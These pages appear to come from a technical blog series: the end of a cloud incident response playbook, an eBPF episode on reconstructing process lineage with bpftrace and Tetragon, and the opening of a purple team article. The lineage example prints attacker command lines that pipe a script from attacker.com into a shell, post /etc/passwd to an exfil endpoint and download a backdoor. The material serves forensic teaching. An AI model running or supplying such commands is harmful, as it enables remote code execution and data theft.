CCPA: “expedient” notification to individuals; no fixed statutory window for regulator notification but AG guidance suggests 72 hours
SEC (public companies): 4 business days from determining the incident is “material”
Check your state breach notification laws — 50 states, 50 different windows
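
Turning these windows into concrete deadlines as soon as the discovery time is logged keeps them visible in the incident channel. The following is a minimal Python sketch, not part of the original playbook. It encodes only the GDPR, HIPAA, and SEC windows listed above, counts Monday to Friday as business days without accounting for public holidays, and uses hypothetical names (notification_deadlines, add_business_days) and illustrative timestamps. Confirm the dates with legal counsel before acting on them.

```python
from datetime import datetime, timedelta

def add_business_days(start, days):
    """Advance by N business days (Mon-Fri); public holidays are NOT handled."""
    current = start
    while days > 0:
        current += timedelta(days=1)
        if current.weekday() < 5:  # 0-4 are Monday to Friday
            days -= 1
    return current

def notification_deadlines(discovered, material_determined):
    """Deadlines for the windows listed in the playbook text."""
    return {
        "GDPR": discovered + timedelta(hours=72),
        "HIPAA": discovered + timedelta(days=60),
        "SEC": add_business_days(material_determined, 4),
    }

# Illustrative inputs: discovery at incident declaration, and a
# materiality determination two days later (a Friday).
deadlines = notification_deadlines(
    discovered=datetime(2024, 2, 21, 21, 50),
    material_determined=datetime(2024, 2, 23, 10, 0),
)
for regime, due in deadlines.items():
    print(f"{regime}: {due:%Y-%m-%d %H:%M}")
```

The SEC clock runs from the materiality determination rather than from discovery, which is why the function takes two timestamps.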

⚠ Production Gotchas

Revoking a credential mid-operation breaks running jobs. If the compromised IAM role is used by production services, the deny-all policy will immediately break those services. Have a plan for emergency credential rotation before you act — either a separate role for legitimate services or a maintenance window. The contain-vs-service-availability tradeoff is a real one; make it deliberately, document it in the incident log.

CloudTrail data events are not enabled by default. Management events (API calls like CreateUser, RunInstances, AssumeRole) are enabled. Data events (S3 GetObject, Lambda function invocations, DynamoDB item-level activity) must be explicitly enabled and cost extra. If you discover during an incident that you needed S3 data events and didn’t have them, you cannot reconstruct what data the attacker accessed. Enable them before the incident.

Forensic snapshots cost money. EBS snapshot storage is not free, and snapshotting every volume on every compromised instance adds up. Have a pre-approved IR budget that includes forensic snapshot costs — getting financial approval in the middle of an active incident is a delay you don’t want.

Legal hold means don’t delete anything. Once legal is involved, no evidence can be destroyed without legal clearance. That includes the compromised EC2 instances, the forensic snapshots, the log exports, and the incident Slack channel. Set legal-hold tags on all IR artifacts immediately and don’t clean up until legal explicitly says to.

The attacker may still be in. Containment removes one credential and one network path. If the attacker established multiple persistence mechanisms before you detected them, containment is the beginning of the eradication phase, not the end. Assume they’re still in until the persistence hunt is complete.

Multi-account blast radius compounds quickly. AssumeRole chains can cross account boundaries. A compromised role in account A that can assume a role in account B means the blast radius spans both accounts, and CloudTrail logging in account A does not show what the attacker did after assuming the role in account B. Pull CloudTrail from every account in the blast radius.

Quick Reference: IR Checklist — First 24 Hours

Hour 0–1: Declare and Scope

[ ] Declare incident — do not investigate quietly
[ ] Notify: CISO, Legal, on-call SRE lead
[ ] Create incident Slack channel: #incident-YYYY-MM-DD-descriptor
[ ] Start timestamped incident log (shared doc, assign scribe)
[ ] Query CloudTrail: last 1–2 hours of suspected principal activity
[ ] Check GuardDuty for active findings
[ ] Answer: active or historical? blast radius? data at risk?

Hour 1–4: Preserve, Then Contain

[ ] FIRST: Snapshot all volumes on compromised EC2 instances
[ ] FIRST: Export CloudTrail logs for incident window to IR evidence directory
[ ] FIRST: Export VPC Flow Logs for incident window
[ ] Revoke compromised IAM credential (disable key or attach deny-all policy)
[ ] For role sessions: use DateLessThan condition to invalidate active sessions
[ ] Apply isolation security group to compromised EC2 instances (do NOT terminate)
[ ] Cordon compromised Kubernetes nodes (do NOT delete pods before forensic capture)
[ ] Collect pod forensics: spec, env vars, process list, network connections

Hour 4–12: Investigate

[ ] Trace AssumeRole chain from compromised principal — build the lateral movement graph
[ ] Query S3 GetObject, GetSecretValue, Decrypt events for data access scope
[ ] Hunt persistence: new IAM users/roles, new access keys, Lambda modifications
[ ] Check EC2 user-data modifications, new CloudFormation stacks
[ ] Pull Tetragon/Falco evidence if available — process lineage and connection logs
[ ] Cross-account check: pull CloudTrail from every account reached via AssumeRole

Hour 12–24: Eradicate and Recover

[ ] Delete all unauthorized IAM users/roles/access keys created during incident
[ ] Rotate ALL credentials in the blast radius (not just the initial compromise)
[ ] Remove Lambda backdoors — replace entire deployment package, reset environment
[ ] Replace compromised instances from known-good hardened AMI (do not patch-in-place)
[ ] Recover: dev → staging → prod. Verify detection fires in dev before promoting.
[ ] Declare all-clear only after monitoring shows clean in prod for 4+ hours

Ongoing: Regulatory and Communication

[ ] Log discovery time — regulatory clocks (GDPR 72h, HIPAA 60d) start at discovery
[ ] Legal hold on all IR artifacts — do not delete without legal clearance
[ ] Schedule post-incident review within 72 hours of resolution
[ ] Update this playbook before the next incident

Key Takeaways

A cloud incident response playbook only works if it has been rehearsed before the incident: the Change Healthcare attack showed that nine days of undetected dwell time transforms a credential theft into a national healthcare disruption
Preserve before you contain: snapshot volumes and export logs before revoking credentials or isolating instances — forensic evidence destroyed during hasty containment cannot be reconstructed
The contain-vs-evidence tension is real and deliberate: isolated EC2 instances remain available for forensic access via IR bastion; terminated instances do not
CloudTrail data events (S3 GetObject, Lambda invocations) are not enabled by default — if you need them during an incident and haven’t pre-enabled them, your data access scope is unknown
Recovery sequence is dev → staging → prod, and you verify detection fires in dev before promoting — if you can’t reproduce the detection that caught the original incident, you don’t know if it still works

What’s Next

This playbook is reactive. You run it after something goes wrong. EP13 is about making it proactive — running structured attack simulations against your own infrastructure on a regular cadence so the first time your team works through this sequence is not during an actual breach. Continuous purple team testing means your IR team has muscle memory for the playbook, your detection tooling is validated against real attack patterns, and your blast radius assumptions are tested before an attacker tests them for you.

Process Lineage — Reconstructing What Happened After the Fact

Updated July 6, 2026 · Published June 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel handles a fork() or execve() system call, capturing the process name, PID, parent PID, and arguments in the kernel, where a process inside the container cannot intercept or suppress the capture)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store off the node are out of that process’s reach
The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is where the state lives: Tetragon keeps a kernel-side cache of process state in BPF maps, while Falco rebuilds lineage in userspace from its syscall event stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node: verify exec tracing is available (runs for 10 seconds)
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}
interval:s:10 { exit(); }'

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

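Sample Tetragon output (simplified; real events carry more fields and link to the parent through parent_exec_id rather than a parent_pid):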

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              ├── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
              └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (permission checks, binary format checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. Keeps the same PID: execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.
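
The claim that the PID survives execve is easy to check from userspace. A small sketch, assuming a Linux or other Unix host with Python 3; it forks, has the child exec a fresh interpreter that reports its own PID and parent PID through a pipe, and hands both back to the parent for comparison:

```python
import os
import sys


def fork_then_exec():
    """Fork a child, exec a new program in it, and report the PIDs it sees."""
    read_fd, write_fd = os.pipe()
    child_pid = os.fork()              # parent receives the child's PID, child receives 0
    if child_pid == 0:
        try:
            os.close(read_fd)
            os.dup2(write_fd, 1)       # route the child's stdout into the pipe
            # execv replaces the process image; the PID stays the same.
            os.execv(sys.executable, [
                sys.executable, "-c",
                "import os; print(os.getpid(), os.getppid())",
            ])
        finally:
            os._exit(127)              # only reached if execv itself fails
    os.close(write_fd)
    with os.fdopen(read_fd) as pipe:
        pid_after_exec, ppid_after_exec = map(int, pipe.read().split())
    os.waitpid(child_pid, 0)
    return child_pid, pid_after_exec, ppid_after_exec


child_pid, pid_after_exec, ppid_after_exec = fork_then_exec()
print(f"fork returned {child_pid}; after exec the child reports pid={pid_after_exec}, ppid={ppid_after_exec}")
```

The PID returned by fork and the PID reported after exec match, and the reported parent is the forking process. That pair of facts is what lets a tracer stitch fork and exec events into one tree.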

Building the Process Tree with kprobes

The two core hooks for process lineage, attached here through syscall tracepoints:

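# Every fork: capture the parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    // Tracepoints expose the return value as args->ret (retval is for kretprobes).
    // In the parent, a positive value is the new child PID (or a TID for threads).
    // Some runtimes call clone3; attach sys_exit_clone3 the same way.
    if (args->ret > 0) {
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, args->ret, comm);
    }
}'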

# Every exec: capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=",
           pid,
           curtask->real_parent->tgid,
           str(args->filename));
    // join() prints the whole argv array followed by a newline;
    // str(*args->argv) would print only argv[0].
    join(args->argv);
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream, a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event and queryable for as long as the agent is running.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, cgroup, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

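To inspect Tetragon’s process cache directly (map names and value layouts differ between Tetragon versions, so treat the name process_cache and the output below as illustrative; if the grep returns nothing, list all maps and look for the exec-tracking map, which upstream builds name execve_map):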

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.
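
Turning that cgroup path into a pod UID is a string-parsing step. A minimal sketch, assuming the two common kubelet layouts (cgroupfs with dashes in the UID, the systemd driver with underscores); the sample paths and UID are hypothetical, and other runtimes may lay paths out differently:

```python
import re

# "pod" followed by a UUID whose groups are separated by "-" (cgroupfs) or "_" (systemd).
_POD_UID = re.compile(
    r"pod([0-9a-fA-F]{8}(?:[-_][0-9a-fA-F]{4}){3}[-_][0-9a-fA-F]{12})"
)


def pod_uid_from_cgroup(path: str):
    """Return the pod UID embedded in a cgroup path, or None for non-pod processes."""
    match = _POD_UID.search(path)
    if match is None:
        return None
    return match.group(1).replace("_", "-").lower()


# Hypothetical sample paths, one per cgroup driver, plus a host process.
samples = [
    "/kubepods/burstable/pod11111111-2222-3333-4444-555555555555/0123abcd",
    "/kubepods.slice/kubepods-burstable.slice/"
    "kubepods-burstable-pod11111111_2222_3333_4444_555555555555.slice/"
    "cri-containerd-0123abcd.scope",
    "/system.slice/sshd.service",
]
for path in samples:
    print(pod_uid_from_cgroup(path), "<-", path)
```

The UID can then be matched against the `metadata.uid` of pods in the API server, or against your own archive of pod metadata if the pod no longer exists.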

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["host_ns"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.
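
That cross-reference is a join between connection events and the exec tree. A small sketch using the PIDs from the example above; the dictionaries are trimmed, hand-written stand-ins for exported events, not Tetragon's actual schema:

```python
# Exec events reduced to the fields needed for lineage (values from the example above).
exec_events = [
    {"pid": 18201, "ppid": None, "binary": "/usr/local/bin/my-app"},
    {"pid": 18293, "ppid": 18201, "binary": "/bin/sh"},
    {"pid": 18294, "ppid": 18293, "binary": "/bin/sh"},
    {"pid": 18296, "ppid": 18294, "binary": "/usr/bin/curl"},
    {"pid": 18297, "ppid": 18294, "binary": "/usr/bin/wget"},
]
connect_events = [
    {"pid": 18296, "dst": "93.184.216.34"},
    {"pid": 18297, "dst": "93.184.216.34"},
]


def ancestry(pid, processes):
    """Walk parent links from `pid` up to the oldest known ancestor."""
    chain, seen = [], set()
    while pid in processes and pid not in seen:   # `seen` guards against cycles
        seen.add(pid)
        chain.append(f"{processes[pid]['binary']}({pid})")
        pid = processes[pid]["ppid"]
    return " <- ".join(chain)


processes = {event["pid"]: event for event in exec_events}
attributed = [(c["dst"], ancestry(c["pid"], processes)) for c in connect_events]
for dst, chain in attributed:
    print(f"{dst}: {chain}")
```

Each outbound connection now reads as a full chain back to the application process, which is the form an incident timeline needs.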

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec and exit events to a file; run in the background on the node.
# nsecs counts nanoseconds since boot, so note the boot time (uptime -s)
# if you need wall-clock timestamps later.
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output (timestamps shown as epoch nanoseconds for readability; raw nsecs values count from boot):

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.
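
Grouping by ppid and ordering by timestamp can be sketched in a few lines. The parser below assumes the exact log format shown above and that no PID is reused inside the window being analysed; the function names are illustrative:

```python
import re
from collections import defaultdict

EXEC_LINE = re.compile(r"^(\d+)\s+EXEC\s+pid=(\d+)\s+ppid=(\d+)\s+binary=(\S+)")

# Sample lines copied from the output above.
LOG = """\
1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
"""


def parse_exec_events(lines):
    """Return (timestamp, pid, ppid, binary) tuples sorted by timestamp."""
    events = []
    for line in lines:
        match = EXEC_LINE.match(line.strip())
        if match:                      # EXIT lines and noise are skipped
            ts, pid, ppid, binary = match.groups()
            events.append((int(ts), int(pid), int(ppid), binary))
    return sorted(events)


def render_tree(events, root_pid):
    """Render every descendant of `root_pid` as an indented list of lines."""
    children = defaultdict(list)
    for _ts, pid, ppid, binary in events:
        children[ppid].append((pid, binary))
    lines, visited = [], set()

    def walk(pid, depth):
        for child_pid, binary in children.get(pid, []):
            lines.append("  " * depth + f"{binary} ({child_pid})")
            if child_pid not in visited:   # descend once even if a PID execs twice
                visited.add(child_pid)
                walk(child_pid, depth + 1)

    walk(root_pid, 0)
    return lines


tree = render_tree(parse_exec_events(LOG.splitlines()), root_pid=18201)
print("\n".join(tree))
```

Start the walk from the PID of the application process you suspect was the entry point; everything underneath it is attacker-reachable activity.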

⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace’s comm built-in has the same limit. For the full binary path, read from execve’s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon handles this by identifying each process with an exec_id derived from the PID and start time, not the PID alone.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.
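
The PID reuse gotcha above is the one most likely to corrupt a reconstruction silently, so it is worth making concrete. A minimal sketch, assuming each exec event carries a start time; the field names and the second (reused) process are hypothetical:

```python
from typing import NamedTuple, Optional


class ProcessKey(NamedTuple):
    pid: int
    start_time_ns: int


def index_processes(exec_events):
    """Index processes by (pid, start time) so a reused PID gets its own entry."""
    return {
        ProcessKey(e["pid"], e["start_time_ns"]): e["binary"]
        for e in exec_events
    }


def attribute(event, processes) -> Optional[str]:
    """Return the binary that owned event['pid'] at the time of the event."""
    candidates = [
        key for key in processes
        if key.pid == event["pid"] and key.start_time_ns <= event["time_ns"]
    ]
    if not candidates:
        return None
    return processes[max(candidates, key=lambda key: key.start_time_ns)]


# Hypothetical data: PID 18296 is the attacker's curl, then gets reused by nginx.
processes = index_processes([
    {"pid": 18296, "start_time_ns": 1_000, "binary": "/usr/bin/curl"},
    {"pid": 18296, "start_time_ns": 9_000, "binary": "/usr/sbin/nginx"},
])

print(attribute({"pid": 18296, "time_ns": 1_500}, processes))
print(attribute({"pid": 18296, "time_ns": 9_500}, processes))
```

A lookup keyed on PID alone would attribute both events to whichever process was recorded last. This sketch ignores exit times; a fuller version would also reject events that arrive after the owning process has exited.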

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list | grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc/<pid>/cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (return value > 0 = child PID, as seen in the parent)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events are out of reach of a compromised container process: an attacker with root inside an unprivileged container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls, short of escaping to the host

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

What Is Purple Team Security: Red + Blue = Better Defense

May 11, 2026 by Vamshi Krishna Santhapuri

Reading Time: 8 minutes

TL;DR

Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
Traditional red team engagements produce a report; purple team produces a lower MTTD (mean time to detect)
The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.

The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                     │
│              │ What didn't│                                     │
│              │ Why?       │                                     │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.

Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.

What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK Enterprise matrix lists roughly 200 techniques and more than 400 sub-techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

